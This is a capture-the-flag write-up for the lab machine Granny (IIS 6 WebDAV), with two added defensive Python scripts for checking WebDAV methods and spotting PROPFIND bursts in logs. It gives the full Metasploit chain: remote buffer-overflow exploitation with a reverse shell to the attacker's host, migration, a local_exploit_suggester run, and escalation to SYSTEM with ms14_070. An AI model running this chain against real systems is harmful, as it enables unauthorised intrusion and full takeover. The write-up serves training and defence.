About Granny

Granny

Nmap

The port scan reveals IIS 6 running on this machine, with WebDAV enabled and a long list of risky methods allowed.

# nmap -sV -sT -sC -o nmapinitial 10.10.10.15
Starting Nmap 7.70 ( https://nmap.org ) at 2020-01-25 10:55 EST
Nmap scan report for 10.10.10.15
Host is up (0.22s latency).
Not shown: 999 filtered ports
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   WebDAV type: Unkown
|   Server Date: Sat, 25 Jan 2020 15:56:14 GMT
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_  Server Type: Microsoft-IIS/6.0
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 29.67 seconds
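The http-methods and http-webdav-scan output above is worth turning into a repeatable check: on a public IIS host, none of the WebDAV write or enumeration methods should be reachable anonymously. The following script is an added example (not part of the original writeup and not an nmap or Metasploit component); it parses the scan text from this page, which is embedded below as a constructed sample, and reports which risky methods the root path actually allows versus which ones the server merely advertises in Public Options.

```python
# Added example: parse nmap's http-webdav-scan output and flag WebDAV
# methods exposed on an IIS host. The sample input is the scan from this
# writeup, embedded here as a constructed string.
import re

# Methods that modify content or enumerate structure. A public IIS 6 host
# should not serve any of these to an unauthenticated client.
RISKY_METHODS = {"PUT", "DELETE", "COPY", "MOVE", "MKCOL", "PROPFIND",
                 "PROPPATCH", "SEARCH", "LOCK", "UNLOCK", "TRACE"}

# Core WebDAV verbs; if any of these is allowed, the WebDAV extension is on.
WEBDAV_CORE = {"PROPFIND", "PROPPATCH", "MKCOL", "LOCK", "UNLOCK"}

SAMPLE_SCAN = """\
PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
|_http-server-header: Microsoft-IIS/6.0
| http-webdav-scan: 
|   WebDAV type: Unkown
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|_  Server Type: Microsoft-IIS/6.0
"""


def _method_set(body):
    """Turn 'Label: A, B, C' into {'A', 'B', 'C'}."""
    return {m.strip().upper() for m in body.split(":", 1)[1].split(",") if m.strip()}


def parse_webdav_scan(report):
    """Return {port: {'server', 'public', 'allowed'}} from nmap's text report."""
    hosts = {}
    port = None
    for line in report.splitlines():
        m = re.match(r"^(\d+)/tcp\s+open\s+\S+\s+(.*)$", line)
        if m:
            port = int(m.group(1))
            hosts[port] = {"server": m.group(2).strip(), "public": set(), "allowed": set()}
            continue
        if port is None or not line.startswith("|"):
            continue
        body = line.lstrip("|_ ").strip()
        if body.startswith("Public Options:"):
            hosts[port]["public"] = _method_set(body)
        elif body.startswith("Allowed Methods:"):
            hosts[port]["allowed"] = _method_set(body)
    return hosts


def assess(hosts):
    """Per port: risky methods allowed on '/', methods only advertised, WebDAV on/off."""
    findings = {}
    for port, info in hosts.items():
        findings[port] = {
            "allowed_risky": sorted(info["allowed"] & RISKY_METHODS),
            # Advertised via OPTIONS but not in the per-path Allow header.
            "advertised_only": sorted(info["public"] - info["allowed"]),
            "webdav_enabled": bool(info["allowed"] & WEBDAV_CORE),
        }
    return findings


if __name__ == "__main__":
    for port, f in assess(parse_webdav_scan(SAMPLE_SCAN)).items():
        print(f"port {port}: webdav={'on' if f['webdav_enabled'] else 'off'}")
        print("  risky methods allowed on /:", ", ".join(f["allowed_risky"]))
        print("  advertised but not allowed on /:", ", ".join(f["advertised_only"]))
```

On this scan the root path allows ten risky methods, while PUT appears only in Public Options. That gap is why an inventory check should compare the per-path Allow header and not just the server-wide OPTIONS response; the fix on a host that does not need WebDAV is to disable the extension in IIS rather than to filter individual verbs.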

IIS 6 exploitation

This machine is running IIS 6, and searchsploit shows there's an exploit for the WebDAV ScStoragePathFromUrl buffer overflow, which also has a Metasploit module.

# searchsploit IIS 6.0
------------------------------------------------------------------------------------------- ----------------------------------
 Exploit Title                                                                             |  Path
                                                                                           | (/usr/share/exploitdb/)
------------------------------------------------------------------------------------------- ----------------------------------
Microsoft IIS 4.0/5.0/6.0 - Internal IP Address/Internal Network Name Disclosure           | exploits/windows/remote/21057.txt
Microsoft IIS 5.0/6.0 FTP Server (Windows 2000) - Remote Stack Overflow                    | exploits/windows/remote/9541.pl
Microsoft IIS 5.0/6.0 FTP Server - Stack Exhaustion Denial of Service                      | exploits/windows/dos/9587.txt
Microsoft IIS 6.0 - '/AUX / '.aspx' Remote Denial of Service                               | exploits/windows/dos/3965.pl
Microsoft IIS 6.0 - ASP Stack Overflow Stack Exhaustion (Denial of Service) (MS10-065)     | exploits/windows/dos/15167.txt
Microsoft IIS 6.0 - WebDAV 'ScStoragePathFromUrl' Remote Buffer Overflow                   | exploits/windows/remote/41738.py
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (1)                                | exploits/windows/remote/8704.txt
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)                                | exploits/windows/remote/8806.pl
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)                              | exploits/windows/remote/8765.php
Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)                            | exploits/windows/remote/8754.patch
Microsoft IIS 6.0/7.5 (+ PHP) - Multiple Vulnerabilities                                   | exploits/windows/remote/19033.txt
------------------------------------------------------------------------------------------- ----------------------------------
Shellcodes: No Result

Getting a shell with the Metasploit module:

# msfconsole -q
[-] ***
[-] * WARNING: No database support: No database YAML file
[-] ***
msf5 > use exploit/windows/iis/iis_webdav_scstoragepathfromurl 
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > set rhost 10.10.10.15
rhost => 10.10.10.15
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > run

[*] Started reverse TCP handler on 10.10.14.46:4444 
[*] Trying path length 3 to 60 ...
[*] Sending stage (180291 bytes) to 10.10.10.15
[*] Meterpreter session 1 opened (10.10.14.46:4444 -> 10.10.10.15:1030) at 2020-02-01 09:10:35 -0500

meterpreter >
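The module run above cycles through path lengths 3 to 60, and the ScStoragePathFromUrl overflow is reached through PROPFIND, so from the server's side the exploit looks like a rapid run of WebDAV requests from one client against a host that normally serves GETs. The following detector is an added example, not part of the original writeup: it reads IIS W3C-format log lines (the field list below is the common IIS 6 default set and is an assumption of this example) and flags any client that issues a burst of WebDAV methods inside a short window. The log records are constructed for the example.

```python
# Added example: flag bursts of WebDAV requests per client in IIS W3C logs.
# The log excerpt is constructed; the #Fields line reflects a typical IIS 6
# default field set and is an assumption of this example.
import datetime as dt
from collections import defaultdict, deque

WEBDAV_METHODS = {"PROPFIND", "PROPPATCH", "MKCOL", "COPY", "MOVE",
                  "LOCK", "UNLOCK", "SEARCH", "PUT", "DELETE"}

SAMPLE_LOG = """\
#Software: Microsoft Internet Information Services 6.0
#Version: 1.0
#Date: 2020-02-01 14:09:00
#Fields: date time s-ip cs-method cs-uri-stem cs-uri-query s-port cs-username c-ip cs(User-Agent) sc-status sc-substatus sc-win32-status
2020-02-01 14:09:12 10.10.10.15 GET /iisstart.htm - 80 - 10.10.14.1 Mozilla/5.0 200 0 0
2020-02-01 14:09:40 10.10.10.15 PROPFIND /wmpub - 80 - 10.10.14.7 Microsoft-WebDAV-MiniRedir/5.1.2600 207 0 0
2020-02-01 14:10:20 10.10.10.15 PROPFIND /aaa - 80 - 10.10.14.46 - 207 0 0
2020-02-01 14:10:22 10.10.10.15 PROPFIND /aaaa - 80 - 10.10.14.46 - 207 0 0
2020-02-01 14:10:24 10.10.10.15 PROPFIND /aaaaa - 80 - 10.10.14.46 - 207 0 0
2020-02-01 14:10:26 10.10.10.15 PROPFIND /aaaaaa - 80 - 10.10.14.46 - 207 0 0
2020-02-01 14:10:28 10.10.10.15 PROPFIND /aaaaaaa - 80 - 10.10.14.46 - 207 0 0
2020-02-01 14:10:31 10.10.10.15 PROPFIND /aaaaaaaa - 80 - 10.10.14.46 - 207 0 0
2020-02-01 14:10:50 10.10.10.15 GET / - 80 - 10.10.14.1 Mozilla/5.0 200 0 0
"""


def parse_w3c(log_text):
    """Yield one dict per record, keyed by the names in the #Fields header."""
    fields = None
    for line in log_text.splitlines():
        if line.startswith("#Fields:"):
            fields = line.split()[1:]
            continue
        if not line or line.startswith("#"):
            continue
        if fields is None:
            raise ValueError("record appears before a #Fields header")
        values = line.split()  # W3C encodes spaces inside a field as '+'
        if len(values) != len(fields):
            continue  # malformed record: skip it rather than abort the scan
        yield dict(zip(fields, values))


def find_webdav_bursts(log_text, threshold=5, window_seconds=60):
    """Return {client_ip: {'count', 'first', 'last', 'methods'}} for clients
    that sent at least `threshold` WebDAV requests within `window_seconds`."""
    recent = defaultdict(deque)  # client ip -> (timestamp, method, path) in window
    flagged = {}
    for rec in parse_w3c(log_text):
        method = rec["cs-method"].upper()
        if method not in WEBDAV_METHODS:
            continue
        ts = dt.datetime.strptime(rec["date"] + " " + rec["time"], "%Y-%m-%d %H:%M:%S")
        q = recent[rec["c-ip"]]
        q.append((ts, method, rec["cs-uri-stem"]))
        # Drop entries that have aged out of the sliding window.
        while q and (ts - q[0][0]).total_seconds() > window_seconds:
            q.popleft()
        if len(q) >= threshold:
            entry = flagged.setdefault(rec["c-ip"], {"count": 0, "first": q[0][0],
                                                     "last": ts, "methods": set()})
            entry["count"] = max(entry["count"], len(q))
            entry["last"] = ts
            entry["methods"].update(m for _, m, _ in q)
    return flagged


if __name__ == "__main__":
    for ip, hit in find_webdav_bursts(SAMPLE_LOG).items():
        print(f"{ip}: {hit['count']} WebDAV requests between {hit['first']:%H:%M:%S} "
              f"and {hit['last']:%H:%M:%S} using {', '.join(sorted(hit['methods']))}")
```

The single PROPFIND from 10.10.14.7 is not flagged; the six in eleven seconds from 10.10.14.46 are. Tune the threshold to the server's real WebDAV traffic, and note that the overflow itself is carried in a request header that default IIS logging does not record, so this catches the probing pattern rather than the payload. On a host that has no business serving WebDAV, the lower-noise signal is simply any WebDAV method at all.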

Next, migrate Meterpreter into a new process. The migrate post module spawns a background process on the victim (notepad.exe here) and moves the session into it, so the shell no longer depends on the process the exploit landed in.

meterpreter > run post/windows/manage/migrate

[*] Running module against GRANNY
[*] Current server process: rundll32.exe (2460)
[*] Spawning notepad.exe process to migrate to
[+] Migrating to 3932
[+] Successfully migrated to process 3932
meterpreter > 

Privilege escalation

I used local_exploit_suggester to find privilege escalation vulnerabilities.

meterpreter > background
[*] Backgrounding session 1...
msf5 exploit(windows/iis/iis_webdav_scstoragepathfromurl) > use post/multi/recon/local_exploit_suggester 
msf5 post(multi/recon/local_exploit_suggester) > set session 1
session => 1
msf5 post(multi/recon/local_exploit_suggester) > run

[*] 10.10.10.15 - Collecting local exploits for x86/windows...
[*] 10.10.10.15 - 29 exploit checks are being tried...
[+] 10.10.10.15 - exploit/windows/local/ms10_015_kitrap0d: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms14_058_track_popup_menu: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms14_070_tcpip_ioctl: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms15_051_client_copy_image: The target appears to be vulnerable.
[+] 10.10.10.15 - exploit/windows/local/ms16_016_webdav: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ms16_032_secondary_logon_handle_privesc: The service is running, but could not be validated.
[+] 10.10.10.15 - exploit/windows/local/ppr_flatten_rec: The target appears to be vulnerable.
[*] Post module execution completed
msf5 post(multi/recon/local_exploit_suggester) > sessions -i 1
[*] Starting interaction with 1...

meterpreter >

Several candidates were found. This time, escalate privileges with ms14_070_tcpip_ioctl.

meterpreter > background
[*] Backgrounding session 1...
msf5 post(multi/recon/local_exploit_suggester) > use exploit/windows/local/ms14_070_tcpip_ioctl 
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > set session 1
session => 1
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > run

[*] Started reverse TCP handler on 10.0.2.15:4444 
[*] Storing the shellcode in memory...
[*] Triggering the vulnerability...
[*] Checking privileges after exploitation...
[+] Exploitation successful!
[*] Exploit completed, but no session was created.
msf5 exploit(windows/local/ms14_070_tcpip_ioctl) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter >

I have SYSTEM access, and I can now read the flag:

meterpreter > cd ../../../../../
meterpreter > pwd
c:\
meterpreter > ls
Listing: c:\
============

Mode                Size               Type  Last modified                    Name
----                ----               ----  -------------                    ----
40777/rwxrwxrwx     0                  dir   2017-04-12 10:27:12 -0400        ADFS
100777/rwxrwxrwx    0                  fil   2017-04-12 10:04:44 -0400        AUTOEXEC.BAT
100666/rw-rw-rw-    0                  fil   2017-04-12 10:04:44 -0400        CONFIG.SYS
40777/rwxrwxrwx     0                  dir   2017-04-12 09:42:38 -0400        Documents and Settings
40777/rwxrwxrwx     0                  dir   2017-04-12 10:17:24 -0400        FPSE_search
100444/r--r--r--    0                  fil   2017-04-12 10:04:44 -0400        IO.SYS
40777/rwxrwxrwx     0                  dir   2017-04-12 10:16:33 -0400        Inetpub
100444/r--r--r--    0                  fil   2017-04-12 10:04:44 -0400        MSDOS.SYS
100555/r-xr-xr-x    47772              fil   2007-02-18 07:00:00 -0500        NTDETECT.COM
40555/r-xr-xr-x     0                  dir   2017-04-12 09:43:02 -0400        Program Files
40777/rwxrwxrwx     0                  dir   2017-04-12 15:02:02 -0400        RECYCLER
40777/rwxrwxrwx     0                  dir   2017-04-12 09:42:38 -0400        System Volume Information
40777/rwxrwxrwx     0                  dir   2017-04-12 09:41:07 -0400        WINDOWS
100666/rw-rw-rw-    208                fil   2017-04-12 09:42:08 -0400        boot.ini
100444/r--r--r--    297072             fil   2007-02-18 07:00:00 -0500        ntldr
55611620/rw--w----  45595321274761199  fif   1453862520-01-07 02:04:32 -0500  pagefile.sys
40777/rwxrwxrwx     0                  dir   2017-04-12 10:05:06 -0400        wmpub

meterpreter > cd Documents\ and\ Settings 
meterpreter > ls
Listing: c:\Documents and Settings
==================================

Mode             Size  Type  Last modified              Name
----             ----  ----  -------------              ----
40777/rwxrwxrwx  0     dir   2017-04-12 10:12:15 -0400  Administrator
40777/rwxrwxrwx  0     dir   2017-04-12 09:42:38 -0400  All Users
40777/rwxrwxrwx  0     dir   2017-04-12 09:42:38 -0400  Default User
40777/rwxrwxrwx  0     dir   2017-04-12 15:19:46 -0400  Lakis
40777/rwxrwxrwx  0     dir   2017-04-12 10:08:32 -0400  LocalService
40777/rwxrwxrwx  0     dir   2017-04-12 10:08:31 -0400  NetworkService

meterpreter >

User flag:

meterpreter > cd Lakis
meterpreter > ls
Listing: c:\Documents and Settings\Lakis
========================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-04-12 15:19:46 -0400  Application Data
40777/rwxrwxrwx   0       dir   2017-04-12 15:19:46 -0400  Cookies
40777/rwxrwxrwx   0       dir   2017-04-12 15:19:46 -0400  Desktop
40555/r-xr-xr-x   0       dir   2017-04-12 15:19:46 -0400  Favorites
40777/rwxrwxrwx   0       dir   2017-04-12 15:19:46 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2017-04-12 15:19:46 -0400  My Documents
100666/rw-rw-rw-  524288  fil   2017-04-12 15:19:46 -0400  NTUSER.DAT
40777/rwxrwxrwx   0       dir   2017-04-12 15:19:46 -0400  NetHood
40777/rwxrwxrwx   0       dir   2017-04-12 15:19:46 -0400  PrintHood
40555/r-xr-xr-x   0       dir   2017-04-12 15:19:46 -0400  Recent
40555/r-xr-xr-x   0       dir   2017-04-12 15:19:46 -0400  SendTo
40555/r-xr-xr-x   0       dir   2017-04-12 15:19:46 -0400  Start Menu
100666/rw-rw-rw-  0       fil   2017-04-12 15:19:46 -0400  Sti_Trace.log
40777/rwxrwxrwx   0       dir   2017-04-12 15:19:46 -0400  Templates
100666/rw-rw-rw-  1024    fil   2017-04-12 15:19:46 -0400  ntuser.dat.LOG
100666/rw-rw-rw-  178     fil   2017-04-12 15:19:46 -0400  ntuser.ini

meterpreter > cd Desktop 
meterpreter > ls
Listing: c:\Documents and Settings\Lakis\Desktop
================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-04-12 15:19:57 -0400  user.txt

meterpreter > cat user.txt

Root flag:

meterpreter > cd ../../
meterpreter > cd Administrator 
meterpreter > ls
Listing: c:\Documents and Settings\Administrator
================================================

Mode              Size    Type  Last modified              Name
----              ----    ----  -------------              ----
40555/r-xr-xr-x   0       dir   2017-04-12 10:12:15 -0400  Application Data
40777/rwxrwxrwx   0       dir   2017-04-12 10:12:15 -0400  Cookies
40777/rwxrwxrwx   0       dir   2017-04-12 10:12:15 -0400  Desktop
40555/r-xr-xr-x   0       dir   2017-04-12 10:12:15 -0400  Favorites
40777/rwxrwxrwx   0       dir   2017-04-12 10:12:15 -0400  Local Settings
40555/r-xr-xr-x   0       dir   2017-04-12 10:12:15 -0400  My Documents
100666/rw-rw-rw-  786432  fil   2017-04-12 10:12:15 -0400  NTUSER.DAT
40777/rwxrwxrwx   0       dir   2017-04-12 10:12:15 -0400  NetHood
40777/rwxrwxrwx   0       dir   2017-04-12 10:12:15 -0400  PrintHood
40555/r-xr-xr-x   0       dir   2017-04-12 10:12:15 -0400  Recent
40555/r-xr-xr-x   0       dir   2017-04-12 10:12:15 -0400  SendTo
40555/r-xr-xr-x   0       dir   2017-04-12 10:12:15 -0400  Start Menu
100666/rw-rw-rw-  0       fil   2017-04-12 10:12:15 -0400  Sti_Trace.log
40777/rwxrwxrwx   0       dir   2017-04-12 10:12:15 -0400  Templates
40777/rwxrwxrwx   0       dir   2017-04-12 14:48:10 -0400  UserData
100666/rw-rw-rw-  1024    fil   2017-04-12 10:12:15 -0400  ntuser.dat.LOG
100666/rw-rw-rw-  178     fil   2017-04-12 10:12:15 -0400  ntuser.ini

meterpreter > cd Desktop 
meterpreter > ls
Listing: c:\Documents and Settings\Administrator\Desktop
========================================================

Mode              Size  Type  Last modified              Name
----              ----  ----  -------------              ----
100444/r--r--r--  32    fil   2017-04-12 10:28:50 -0400  root.txt

meterpreter > cat root.txt